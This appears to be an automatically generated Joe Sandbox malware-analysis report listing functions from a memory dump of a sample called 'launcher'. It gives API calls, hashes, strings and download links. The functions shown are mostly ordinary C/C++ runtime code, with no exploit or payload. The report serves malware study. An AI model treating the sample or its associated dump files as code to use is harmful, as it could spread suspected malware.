Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 16c5664907d16028e38f295199c4355e241e84b68c1c5b036a0746a0d5d7e958
Instruction ID: b32b26480e5bfa12cd431f41186870ff7adebde73eefc307c455e4d77e0ed3f7
Opcode Fuzzy Hash: 16c5664907d16028e38f295199c4355e241e84b68c1c5b036a0746a0d5d7e958
Instruction Fuzzy Hash: 0451E172A04602AFDB289F56C891FBA77F4EF04710F2445ADEA06472A1D731EE40FB94

Function 00B37220 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B372C5
std::_Throw_Cpp_error.LIBCPMT ref: 00B37395
std::_Throw_Cpp_error.LIBCPMT ref: 00B373A3
std::_Throw_Cpp_error.LIBCPMT ref: 00B373B1

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$CurrentThread
String ID:
API String ID: 2261580123-0
Opcode ID: 91330172625a598b05106cf3465564f72c526568fb4dfacd9fd5091283e474e6
Instruction ID: f5401ae5a24eb5855549cdcf136c8b746d89906b841f3faca2c1429de0a533a3
Opcode Fuzzy Hash: 91330172625a598b05106cf3465564f72c526568fb4dfacd9fd5091283e474e6
Instruction Fuzzy Hash: 1141F1F19407499BDB30EB24C881BABB7F4FF44320F2446B9D82647691EB30E816CB95

Function 00B34460 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B34495
std::_Lockit::_Lockit.LIBCPMT ref: 00B344B2
std::_Lockit::~_Lockit.LIBCPMT ref: 00B344D3
std::_Lockit::~_Lockit.LIBCPMT ref: 00B34580

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: 53f6db1ddde7fb72578d6d45111161b7f4231eb6bc64c666e746f50437840fd6
Instruction ID: 20f3208b220e44edff1f87da766724f70e26644927147b765d88071a0f986a6e
Opcode Fuzzy Hash: 53f6db1ddde7fb72578d6d45111161b7f4231eb6bc64c666e746f50437840fd6
Instruction Fuzzy Hash: 7E416771D002588FCB10DF94D844BAEBBF0FB58720F2542A9E85567391DB78AD44CFA1

Function 00B51DC6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00B4C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B4D895,?,00000000,-00000008), ref: 00B4C082

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00B51E2A
__dosmaperr.LIBCMT ref: 00B51E31
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00B51E6B
__dosmaperr.LIBCMT ref: 00B51E72

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: bdc80dd48c8f5eb0f30789e02f9b7ca61fc50f19a6e9454723466088c77e99bb
Instruction ID: 78448496bd91453d4684753ea4b6aeaec718f943a626dad2b6c9b3a3ee3969a1
Opcode Fuzzy Hash: bdc80dd48c8f5eb0f30789e02f9b7ca61fc50f19a6e9454723466088c77e99bb
Instruction Fuzzy Hash: AE21D031600205BFCB21AF698882B2BB7E9FF00366B1089E8FC1997140DB30ED05DBA0

Function 00B42BA2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b408ca6e5a3edc4df9bd2c68ba9a854445d7ff5f969211760ef2aae1337f10dc
Instruction ID: c3227f9386f4bcf8aee61d21c8fbbf0a3fef0a5f64c0d8e739c7aae9527c45ec
Opcode Fuzzy Hash: b408ca6e5a3edc4df9bd2c68ba9a854445d7ff5f969211760ef2aae1337f10dc
Instruction Fuzzy Hash: DA21DE31204215AFCB20AF798CC192A7BE9FF40364B904594F85597252EB30EE40F7A0

Function 00B531BE Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00B531C6

Part of subcall function 00B4C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B4D895,?,00000000,-00000008), ref: 00B4C082

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B531FE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5321E

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 492144e899467577e66b78eab986cd2a97b3191ba77ed460bdaf1241eec57f03
Instruction ID: d6f4692f3b6e93784c86a3bc750294778e4b74ed2bfcd6238d6fa85bd22bfcf8
Opcode Fuzzy Hash: 492144e899467577e66b78eab986cd2a97b3191ba77ed460bdaf1241eec57f03
Instruction Fuzzy Hash: 1311EDB15019157EA7222BB15C8ADBF6EDCDE85BD6B1004E8FA05D2200FFA5DF0491B1

Function 00B3E892 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B3E899
std::_Lockit::_Lockit.LIBCPMT ref: 00B3E8A3
int.LIBCPMT ref: 00B3E8BA

Part of subcall function 00B3C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00B3C1F6
Part of subcall function 00B3C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00B3C210

std::_Lockit::~_Lockit.LIBCPMT ref: 00B3E914

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID:
API String ID: 1383202999-0
Opcode ID: 4e7dc1f210dc3e731d7bdc8b2476a01b11140a6065b41af14a2b55fbdfde8b59
Instruction ID: 301d6b4a4b1309ae4d3be6dd1d4506b73955da91f1235412f6f10ee8e40d3944
Opcode Fuzzy Hash: 4e7dc1f210dc3e731d7bdc8b2476a01b11140a6065b41af14a2b55fbdfde8b59
Instruction Fuzzy Hash: D211A132904119DBCB05EBA4C955ABEBBF1AF84710F35019AF461BB2D1DF749E00CB91

Function 00B5ADA0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00B5A2EF,00000000,00000001,00000000,?,?,00B54390,?,00000000,00000000), ref: 00B5ADB7
GetLastError.KERNEL32(?,00B5A2EF,00000000,00000001,00000000,?,?,00B54390,?,00000000,00000000,?,?,?,00B53CD6,00000000), ref: 00B5ADC3

Part of subcall function 00B5AE20: CloseHandle.KERNEL32(FFFFFFFE,00B5ADD3,?,00B5A2EF,00000000,00000001,00000000,?,?,00B54390,?,00000000,00000000,?,?), ref: 00B5AE30

___initconout.LIBCMT ref: 00B5ADD3

Part of subcall function 00B5ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B5AD91,00B5A2DC,?,?,00B54390,?,00000000,00000000,?), ref: 00B5AE08

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00B5A2EF,00000000,00000001,00000000,?,?,00B54390,?,00000000,00000000,?), ref: 00B5ADE8

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 2192ac446389a65ca93842551c2afaaf4af978ceb837dc605430c76c5e382160
Instruction ID: f4f4f7d3bbd7b2bcbcef90bbe20e3dd18308ad2f46f0cd37d218526949bb1ef3
Opcode Fuzzy Hash: 2192ac446389a65ca93842551c2afaaf4af978ceb837dc605430c76c5e382160
Instruction Fuzzy Hash: 00F01C36500158BBCF222FD5DC08A9A3F76FF087A2B0041A1FE09961B0DB728860AB91

Function 00B404F5 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00B40507
GetCurrentThreadId.KERNEL32 ref: 00B40516
GetCurrentProcessId.KERNEL32 ref: 00B4051F
QueryPerformanceCounter.KERNEL32(?), ref: 00B4052C

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: be1da974f7631c06359d8c8f9212dbaecb24967f03ae01222cb933568de9b7c4
Instruction ID: 58389d7596cbc6bbef06536e5103d0e7fb5a30221b00b6d111ad6bb361fe8d30
Opcode Fuzzy Hash: be1da974f7631c06359d8c8f9212dbaecb24967f03ae01222cb933568de9b7c4
Instruction Fuzzy Hash: ACF06274D1020DEBCB00DFB4DA4999EBBF4FF1C204B9149A5E412E7150EB74AB449F50

Function 00B50976 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00B4C16A: GetLastError.KERNEL32(?,?,00B45495,00B68E38,0000000C), ref: 00B4C16E
Part of subcall function 00B4C16A: SetLastError.KERNEL32(00000000), ref: 00B4C210

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00B45BD5,?,?,?,00000055,?,-00000050,?,?,?), ref: 00B50A35
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00B45BD5,?,?,?,00000055,?,-00000050,?,?), ref: 00B50A6C

Strings

utf8, xrefs: 00B50B3E

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: cda417fc3d267c4817f1293d1b0738422617fc9c0f65a6752798a33334103a32
Instruction ID: 66911909d642b168bed6d71ec10d01a729b12c917c9a63586510f1c6b669468c
Opcode Fuzzy Hash: cda417fc3d267c4817f1293d1b0738422617fc9c0f65a6752798a33334103a32
Instruction Fuzzy Hash: 0051E431620705AAEB25BB758CC2FBA73E8EF05706F1404E9FD4597182FB70E94887A5

Function 00B373E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Concurrency::details::_Release_chore.LIBCPMT ref: 00B37526
___std_exception_copy.LIBVCRUNTIME ref: 00B37561

Part of subcall function 00B3AF37: CreateThreadpoolWork.KERNEL32(00B3B060,00B38A2A,00000000), ref: 00B3AF46
Part of subcall function 00B3AF37: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 00B3AF53

Strings

Fail to schedule the chore!, xrefs: 00B37551, 00B37560

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: Concurrency::details::_$CreateRelease_choreReschedule_choreThreadpoolWork___std_exception_copy
String ID: Fail to schedule the chore!
API String ID: 3683891980-3313369819
Opcode ID: 2a53445e2c4ddd788942b180402bb62679dc8695ccdbf7832ac4cda590839e5b
Instruction ID: 78ea3ba3c207b2ba6a81e737ebbbef3fc07886734547e72088f33179f6ea0927
Opcode Fuzzy Hash: 2a53445e2c4ddd788942b180402bb62679dc8695ccdbf7832ac4cda590839e5b
Instruction Fuzzy Hash: 5A518BB19012089FCB14DF54DC85BAEBBF0FF48314F2441A9E819AB391DB79AA05CF91

Function 00B4B992 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B4B893,?,?,00000000,00000000,00000000,?), ref: 00B4B9B7

Strings

MOC, xrefs: 00B4B9C9
RCC, xrefs: 00B4B9D1

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 8175532b5e86386437845ccc26b102873693391c1e13fac1de77251463e9d4c1
Instruction ID: 5e3d2d026ac12d91cae413dde183bb81abeb25cb62c130fcee0090aaa38e7eb7
Opcode Fuzzy Hash: 8175532b5e86386437845ccc26b102873693391c1e13fac1de77251463e9d4c1
Instruction Fuzzy Hash: 37413672900209AFCF15DF98CD81EAEBBB5FF48304F188199FA14A7212D735DA50EB51

Function 00B33E90 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00B33EC6
std::_Lockit::~_Lockit.LIBCPMT ref: 00B34002

Part of subcall function 00B3ABC5: _Yarn.LIBCPMT ref: 00B3ABE5
Part of subcall function 00B3ABC5: _Yarn.LIBCPMT ref: 00B3AC09

Strings

bad locale name, xrefs: 00B33F46

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: LockitYarnstd::_$Lockit::_Lockit::~_
String ID: bad locale name
API String ID: 2070049627-1405518554
Opcode ID: e85f03974550f2b718ff4507e7a9b6537159e988ea22afe416aaf26c42b5dbb0
Instruction ID: f35398207772de0e36943f8e80fa2f2da73b732aba0921f1c6d4f87c4443581e
Opcode Fuzzy Hash: e85f03974550f2b718ff4507e7a9b6537159e988ea22afe416aaf26c42b5dbb0
Instruction Fuzzy Hash: 134191F1A007459BEB10DF69C805B17BBF8BF04B14F144268E44997780E3BAE618CBE1

Function 00B4B1FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00B4B475

Strings

csm, xrefs: 00B4B497
csm, xrefs: 00B4B508

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 8c4dc65b643ce466f41815b5130d83bf60228ab7c512e06cfb528b473a09ee1c
Instruction ID: 2eb667c629b1d6e05809b9d7a4c108c45fc240ed03f4794cd478b9ebf22263b7
Opcode Fuzzy Hash: 8c4dc65b643ce466f41815b5130d83bf60228ab7c512e06cfb528b473a09ee1c
Instruction Fuzzy Hash: 4931E871400215EBCF268F54CC50DAABBE6FF18314B1445DAFA4449222C336DF61FB81

Function 00B3B831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00B3B8B9
RaiseException.KERNEL32(?,?,?,?,?), ref: 00B3B8DE

Part of subcall function 00B4060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,00B3F354,02C7BF98,?,?,?,00B3F354,00B33D4A,00B6759C,00B33D4A), ref: 00B4066D

Part of subcall function 00B48353: IsProcessorFeaturePresent.KERNEL32(00000017,00B4C224), ref: 00B4836F

Strings

csm, xrefs: 00B3B86D

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: 2c370370b3d90426122d32bd368131ccf846ba7780a49244c0a4cc6dfd3f0faa
Instruction ID: 5297cc352b58e9f2361e72b6255014f16c181987a3832b7da644c05e2eb6da3c
Opcode Fuzzy Hash: 2c370370b3d90426122d32bd368131ccf846ba7780a49244c0a4cc6dfd3f0faa
Instruction Fuzzy Hash: 4F217C31D01218EBCF24DF99D845EEEB7F9EF44710F640499E606AB254CB70AE45CB91

Function 00B3B46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00B32673

Strings

ios_base::badbit set, xrefs: 00B32650
bad array new length, xrefs: 00B32626

Memory Dump Source

Source File: 00000000.00000002.2017232923.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2017221764.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017252436.0000000000B5D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017319047.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017334145.0000000000B6B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017347280.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017361856.0000000000B72000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2017387497.0000000000BBC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_launcher.jbxd

Similarity

API ID: ___std_exception_copy
String ID: bad array new length$ios_base::badbit set
API String ID: 2659868963-1158432155
Opcode ID: d08596058f80da86c0768a16d3e5a38413d1da721f1895960ac2604c01ed0df2
